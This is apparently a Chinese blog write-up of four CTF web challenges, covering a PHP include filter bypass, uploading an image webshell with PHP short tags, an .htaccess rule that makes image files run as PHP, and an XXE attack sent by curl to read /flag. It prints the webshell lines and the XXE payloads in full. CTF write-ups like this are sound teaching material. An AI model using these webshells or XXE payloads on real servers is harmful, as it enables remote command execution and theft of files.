ctfweb:php/php短标签/.haccess+图片马/XXE

玄武杯 2025ez_include

先来看一下这段代码具体的作用

首先,stream_wrapper_unregister函数移除了php://输入输出流,也就是我们没法用pgp://filter只r不x了

然后是一个高光设计,之后代码用随机函数得到了一个随机十六个字符的文件名,在users下随机创建文件夹,再cd过去,根据客户端 IP 地址生成一个合法的目录名,用于为每个访问者创建独立的临时文件夹,然后将服务器环境信息保存到该目录下的profile文件中,用于记录访问日志,最后,递归删除创建的文件夹

然后进行安全性测试:

  • 把page参数里的 '.' 删掉
  • 检查要访问的目标文件是否包含<?,php

直接测试参数?page=flag

LitCTF 2025easy_file

进去之后是登录页,看一下源码有个注释:

这里直接尝试admin&password就进了

上传图片马被拦截,有内容检测<?php,用php短标签代替

复制代码
echo GIF89a > normal.jpg
echo ^<?= system($_GET["cmd"]); ?^> >> normal.jpg

根据刚才源码提示找到文件位置,进而进行命令执行

GHCTF 2025UPUPUP

先尝试上传一句话木马,尝试失败

学习.gtaccess:通过.htaccess可重写解析规则,使任意扩展名文件以PHP执行

于是思路如下:先传入.htaccess,再传入图片马,使得图片马被执行

复制代码
echo GIF89a; ^<?php system($_REQUEST["cmd"]); ^?^> >> normal.jpg

然后改名为shell.jpg

normal改名为shell.jpg,上传

尝试payload:?cmd=cat flag,回显成功

GHCTF 2025(>﹏<)

源码中存在 XXE 漏洞:

  • load_dtd=True:允许加载外部 DTD

  • resolve_entities=True:允许解析实体

先确认接口是否正常:

复制代码
curl -X POST http://node1.anna.nssctf.cn:22718/ghctf -d 'xml=<root><name>test</name></root>'
复制代码
curl -X POST http://node1.anna.nssctf.cn:22718/ghctf --data-urlencode 'xml=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test "hello">]><root><name>&test;</name></root>'

注意: 必须使用 --data-urlencode,否则 & 符号会被 shell 错误解析。

复制代码
curl -X POST http://node1.anna.nssctf.cn:22718/ghctf --data-urlencode 'xml=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY b SYSTEM "file:///flag">]><root><name>&b;</name></root>'
相关推荐
星空椰10 小时前
Python 面向对象高级:继承与类定义详解
开发语言·python
kyriewen10 小时前
微软用Go重写TypeScript编译器,速度提升10倍,网友:这是“背叛”还是“救赎”?
前端·typescript·ecmascript 6
白露与泡影10 小时前
2026大厂Java面试题大全!牛客网最新版
java·开发语言
Ceelog10 小时前
久坐党自救指南:屏幕前 8 小时,身体到底在经历什么
前端·后端
凯瑟琳.奥古斯特10 小时前
高阶子查询题目精炼
开发语言·数据库·python·职场和发展·数据库开发
西陵10 小时前
Agent 为什么会陷入 Doom Loop?OpenClaw 的破解之道
前端·人工智能·ai编程
雪度娃娃11 小时前
转向现代C++——在意为改写的函数添加 override
开发语言·c++
Hyyy11 小时前
普通前端续命周报——第2周
前端
wuxinyan12311 小时前
工业级大模型学习之路030:Streamlit 企业级智能体前端工作台
前端·学习·streamlit·智能体
修己xj11 小时前
告别无效刷屏!TrendRadar:最快30秒部署的开源热点助手,让你只看真正关心的新闻
前端